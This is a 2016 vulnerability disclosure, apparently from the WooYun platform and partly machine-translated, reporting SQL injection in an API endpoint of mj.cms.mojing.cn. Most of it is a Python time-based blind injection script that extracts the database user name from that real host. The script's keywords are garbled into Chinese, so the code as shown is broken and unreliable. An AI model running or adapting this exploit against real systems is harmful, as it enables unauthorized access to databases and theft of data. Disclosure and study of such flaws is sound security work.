漏洞标题 暴风魔镜某接口SQL注入(附验证脚本) 相关厂商 mojing.cn 漏洞作者 fuckadmin 提交时间 2016-05-04 18:59 公开时间 2016-06-18 19:30 漏…
漏洞标题
Storm镜像接口SQL注入(带验证脚本)
相关制造商
Mojing.cn
漏洞作者
Fuckadmin
提交时间
2016-05-04 18: 59
公共时间
2016-06-18 19: 30
漏洞类型
SQL注入漏洞
危险等级
在
自我评估等级
10
漏洞状态
制造商已确认
标签标签
漏洞详细信息
http://mj.cms.mojing.cn/api/v1/vr_market/source_list.php?source_type=2&category_id={catid}&version=20151016
其中category_id存在注入

漏洞证明:
[完成] MySQL用户是[电子邮件 保护]/*%
#编码=UTF-8
导入httplib
进口时间
导入字符串
导入系统
随机导入
导入urllib
标题={}
Payloads='abcdefghijklmnopqrstuvwxyz0123456789 @ _。'
打印'[%s]开始重试MySQL用户:'%time.strftime('%H:%M:%S',time.localtime())
用户=''
对于范围(1,24):中的i
对于有效负载:中的有效负载
试试:
s='ascii(mid(lower(user()),%s,1))=%s'%(i,ord(payload))
s='aaa'XOR(if(%s,sleep(5),0))OR'bbb'%s
Conn=httplib.HTTPConnection('mj.cms.mojing.cn',timeout=3)
Conn.request(method='GET',url='/api/v1/vr_market/source_list.php?source_type=2& category_id=%s'%urllib.quote(s))
Conn.getresponse()
Conn.close()
打印'。',
除了:
用户+=有效负载
用户,打印'\ n [进行中]'
Time.sleep(5.0)
打破
打印'\ n [完成] MySQL用户是%s'%用户
修理计划:
参数过滤
版权声明:请注明来源fuckadmin @乌云